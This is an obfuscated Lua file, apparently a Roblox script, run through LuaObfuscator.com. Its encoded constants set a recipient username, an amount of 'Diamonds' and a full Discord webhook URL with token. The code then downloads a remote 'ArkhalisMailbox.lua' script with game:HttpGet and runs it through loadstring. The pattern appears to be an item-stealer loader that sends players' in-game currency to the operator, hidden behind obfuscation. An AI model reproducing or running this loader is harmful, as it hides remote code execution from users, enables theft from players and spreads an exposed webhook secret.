--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v83,v19);v19=nil;v90=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/(2^(v32-(2 -1))))%((1 + 1)^(((v33-(2 -1)) -(v32-(1 -0))) + 1 + 0)) ;return v84-(v84%(878 -(282 + (1865 -(226 + 1044))))) ;else local v85=(7128 -5491) -(1523 + 114) ;local v86;while true do if (v85==(0 -0)) then v86=(621 -(555 + (181 -(32 + 85))))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 + (0 -0))) then return v35;end if (v34==((1307 -(87 + 263)) -(892 + (245 -(67 + 113))))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v37 * (628 -372)) + v36 ;end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(3 -2)) then return (v42 * (16778168 -((1054 -252) + 150))) + (v41 * (176444 -110908)) + (v40 * (464 -208)) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + ((2187 -(1069 + 118)) -(915 + 82)) );v18=v18 + (11 -7) ;v38=1 + 0 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 -0 ,4 + 16 ) * ((3 -1)^(32 + 0))) + v43 ;local v47=v20(v44,21,(1960 -(116 + 1022)) -(368 + 423) );local v48=((v20(v44,32)==((12 -9) -2)) and  -(19 -(10 + 8))) or (3 -(2 + 0)) ;if (v47==((1613 -1171) -(416 + 26))) then if (v46==0) then return v48 * (0 -0) ;else local v92=0;while true do if (v92==(0 + 0)) then v47=1 -0 ;v45=0 -0 ;break;end end end elseif (v47==(2485 -(145 + 293))) then return ((v46==(430 -(44 + 386))) and (v48 * (1/((2345 -(814 + 45)) -(998 + (1202 -714)))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 38 + 660) ) * (v45 + (v46/((2 + 0 + 0)^(824 -(201 + 571))))) ;end local function v25(v49)local v50;if  not v49 then local v87=(2308 -(630 + 793)) -(261 + 624) ;while true do if (0==v87) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v67=1081 -(1020 + 60) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1990 -(582 + 1408) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(3 + 1)) then while true do if (3==v53) then v60=nil;while true do local v101=0;while true do if (v101~=1) then else if (v54==(3 -2)) then v59=v23();v60={};for v122=851 -(20 + 830) ,v59 do local v123=0 -0 ;local v124;local v125;local v126;local v127;while true do if ((7 -5)==v123) then while true do if (v124==1) then v127=nil;while true do if (v125~=(1825 -(1195 + 629))) then else if (v126==1) then v127=v21()~=(0 -0) ;elseif (v126==(243 -(187 + 54))) then v127=v24();elseif (v126==(6 -3)) then v127=v25();end v60[v122]=v127;break;end if (v125~=(0 + 0)) then else local v161=0;while true do if (v161==0) then v126=v21();v127=nil;v161=781 -(162 + 618) ;end if (v161==(1 + 0)) then v125=1 + 0 ;break;end end end end break;end if (v124~=(0 + 0)) then else local v152=0 -0 ;while true do if (v152~=0) then else v125=0 -0 ;v126=nil;v152=1;end if (v152~=(1 + 0)) then else v124=3 -2 ;break;end end end end break;end if (v123~=(1636 -(1373 + 263))) then else v124=0;v125=nil;v123=1001 -(451 + 549) ;end if (1==v123) then v126=nil;v127=nil;v123=2;end end end v58[8 -5 ]=v21();v54=379 -(142 + 235) ;end break;end if (v101==(0 + 0)) then if (v54==(0 -0)) then local v119=0;local v120;while true do if (v119==(0 -0)) then v120=1384 -(746 + 638) ;while true do if (v120~=(1 + 0)) then else v57={};v58={v55,v56,nil,v57};v120=2 + 0 ;end if (v120==(2 + 0)) then v54=1 + 0 ;break;end if (v120==(0 + 0)) then local v151=560 -(306 + 254) ;while true do if (v151==(0 + 0)) then v55={};v56={};v151=1 + 0 ;end if (v151~=(1 + 0)) then else v120=1 -0 ;break;end end end end break;end end end if (v54==2) then local v121=1467 -(899 + 568) ;while true do local v128=0 + 0 ;while true do if (v128==(0 -0)) then if (v121==(0 -0)) then for v153=2 -1 ,v23() do local v154=603 -(268 + 335) ;local v155;local v156;local v157;while true do if (v154~=(754 -(239 + 514))) then else v157=nil;while true do if (v155==0) then v156=290 -(60 + 230) ;v157=nil;v155=573 -(426 + 146) ;end if (v155==(1330 -(797 + 532))) then while true do if (v156==(0 + 0)) then v157=v21();if (v20(v157,1,1 + 0 )==(1456 -(282 + 1174))) then local v162=811 -(569 + 242) ;local v163;local v164;local v165;while true do if (v162==(1205 -(373 + 829))) then if (v20(v164,734 -(476 + 255) ,8 -5 )==(1 + 0)) then v165[4]=v60[v165[1028 -(706 + 318) ]];end v55[v153]=v165;break;end if (v162~=(1253 -(721 + 530))) then else local v167=1271 -(945 + 326) ;local v168;while true do if (v167==(0 -0)) then v168=0 + 0 ;while true do if (v168~=(0 -0)) then else local v175=700 -(271 + 429) ;while true do if (v175==(0 + 0)) then if (v20(v164,1501 -(1408 + 92) ,1 + 0 )==1) then v165[2 -0 ]=v60[v165[338 -(144 + 192) ]];end if (v20(v164,1088 -(461 + 625) ,1290 -(993 + 295) )~=(217 -(42 + 174))) then else v165[3]=v60[v165[1 + 2 ]];end v175=1172 -(418 + 753) ;end if (v175~=(1 + 0)) then else v168=1;break;end end end if (v168~=(1 + 0)) then else v162=3;break;end end break;end end end if (v162~=0) then else local v169=0;local v170;while true do if (v169~=(1504 -(363 + 1141))) then else v170=0;while true do if (v170~=1) then else v162=1;break;end if (v170~=(0 + 0)) then else local v176=0 -0 ;while true do if (v176==(1 + 0)) then v170=1 + 0 ;break;end if (v176==0) then v163=v20(v157,2 + 0 ,1978 -(1913 + 62) );v164=v20(v157,533 -(406 + 123) ,1775 -(1749 + 20) );v176=1 + 0 ;end end end end break;end end end if (1==v162) then local v171=0 -0 ;local v172;while true do if (v171==(0 + 0)) then v172=0;while true do if (0~=v172) then else v165={v22(),v22(),nil,nil};if (v163==0) then local v177=0 + 0 ;local v178;while true do if ((0 -0)==v177) then v178=0 -0 ;while true do if (v178~=(1900 -(106 + 1794))) then else v165[1 + 2 ]=v22();v165[4]=v22();break;end end break;end end elseif (v163==(1 + 0)) then v165[3]=v23();elseif (v163==2) then v165[8 -5 ]=v23() -((2 + 0)^(43 -27)) ;elseif (v163~=(1004 -(938 + 63))) then else local v187=114 -(4 + 110) ;local v188;local v189;local v190;while true do if (v187~=0) then else v188=1125 -(936 + 189) ;v189=nil;v187=1 + 0 ;end if (v187==(585 -(57 + 527))) then v190=nil;while true do if (v188==0) then v189=1427 -(41 + 1386) ;v190=nil;v188=1;end if (v188==1) then while true do if (v189==(103 -(17 + 86))) then v190=0 + 0 ;while true do if (0==v190) then v165[3]=v23() -(2^(1154 -(782 + 356))) ;v165[4]=v22();break;end end break;end end break;end end break;end end end v172=1 + 0 ;end if ((1 -0)~=v172) then else v162=2;break;end end break;end end end end end break;end end break;end end break;end if (v154==(0 -0)) then v155=0;v156=nil;v154=167 -(122 + 44) ;end end end for v158=1 -0 ,v23() do v56[v158-(3 -2) ]=v28();end v121=1 + 0 ;end if (v121~=1) then else return v58;end break;end end end end v101=1;end end end break;end if (v53==(1 + 0)) then local v99=0 + 0 ;while true do if (v99~=(1 -0)) then else v53=6 -4 ;break;end if ((65 -(30 + 35))==v99) then v56=nil;v57=nil;v99=1 + 0 ;end end end if (v53~=2) then else v58=nil;v59=nil;v53=1260 -(1043 + 214) ;end if (v53~=(0 -0)) then else local v100=0 -0 ;while true do if (v100==(0 -0)) then v54=1212 -(323 + 889) ;v55=nil;v100=1;end if (v100~=(2 -1)) then else v53=581 -(361 + 219) ;break;end end end end break;end if (v52~=0) then else v53=320 -(53 + 267) ;v54=nil;v52=1 + 0 ;end if (v52==(415 -(15 + 398))) then v57=nil;v58=nil;v52=985 -(18 + 964) ;end if (v52==(11 -8)) then v59=nil;v60=nil;v52=3 + 1 ;end if (v52==(948 -(245 + 702))) then v55=nil;v56=nil;v52=6 -4 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (v89==0) then v81=v69[v73];v82=v81[1];v89=1;end if (v89==1) then if (v82<=3) then if (v82<=1) then if (v82>0) then local v102=0;local v103;local v104;while true do if (v102==1) then v79[v103 + 1 ]=v104;v79[v103]=v104[v81[4]];break;end if (0==v102) then v103=v81[2];v104=v79[v81[3]];v102=1;end end else local v105=v81[2];v79[v105]=v79[v105](v13(v79,v105 + 1 ,v74));end elseif (v82>2) then v79[v81[2]]=v81[3];else local v109=0;local v110;local v111;local v112;local v113;while true do if (v109==2) then for v148=v110,v74 do v113=v113 + 1 ;v79[v148]=v111[v113];end break;end if (1==v109) then v74=(v112 + v110) -1 ;v113=0;v109=2;end if (v109==0) then v110=v81[2];v111,v112=v72(v79[v110](v13(v79,v110 + 1 ,v81[3])));v109=1;end end end elseif (v82<=5) then if (v82>4) then do return;end else v79[v81[2]]=v63[v81[3]];end elseif (v82<=6) then v79[v81[2]][v81[3]]=v81[4];elseif (v82==7) then local v129;local v130;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v130=v81[2];v129=v79[v81[3]];v79[v130 + 1 ]=v129;v79[v130]=v129[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];else v79[v81[2]]();end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D65030D3O004730542O48502O4550414C2O5403083O004469616D6F6E6473023O00E87648374203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313039362O3332312O3338343633303332362F76712D4677322D43554B2D36454F6B2D55416F436A416E7837664B357A79576E4C314F676A3952464872796A4D334F5630424A46695A4A696B56724A5F365F786A694245030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C7561000E3O0012073O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0002000100039O0000022O00083O000100012O00053O00017O00",v9(),...);end